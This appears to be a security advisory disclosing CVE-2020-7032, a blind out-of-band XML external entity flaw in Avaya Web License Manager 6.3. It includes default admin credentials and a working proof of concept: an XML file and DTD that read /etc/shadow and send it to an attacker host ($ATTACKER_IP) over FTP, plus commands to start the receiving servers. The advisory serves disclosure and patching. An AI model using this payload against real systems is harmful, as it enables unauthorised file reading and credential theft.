Vendor Description
“As a global leader in delivering superior communications experiences, Avaya provides the most complete portfolio of software and services for multi-touch contact center and unified communications offered on premises, in the cloud, or a hybrid. Today’s digital world centers on communications enablement, and no other company is better positioned to do this than Avaya.”
Source: https://www.avaya.com/en/
Business Recommendation
The vendor provides a patch for the Avaya Web License Manager which should be installed immediately.
SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues.
Vulnerability Overview / Description
Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)
This vulnerability within the Avaya Web License Manager (WebLM) allows an authenticated user to read arbitrary files in the context of the Webserver (Tomcat) by uploading a specially crafted XML file within the License upload functionality. Accessible sensitive files that can be read are for example /etc/shadow, SSH keys or other configuration files.
Proof Of Concept
Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)
Login as a user to $IP/WebLM/ and navigate to “Install License”. If WebLM has never been used before or not hardened, the default credentials are admin:weblmadmin
Create an XML file like the following:
<?xml version="1.0" ?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://$ATTACKER_IP/xxe_file.dtd"> %asd; %c; ]> <a>&rrr;</a>
and a DTD file like:
<!ENTITY % d SYSTEM "file:///etc/shadow"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://$ATTACKER_IP:2121/%d;'>">
Start a webserver, e.g.
SimpleHTTPServer
python -m SimpleHTTPServer 80
and an FTP Server like GO XXE FTP Server
./xxeserv 2121
Upload the crafted XML file by clicking the install button.
Vulnerable / Tested Versions
The following version has been tested:
- Avaya Web License Manager 6.3
The vendor doesn’t support versions < 7.x. Probably all versions <7 are affected.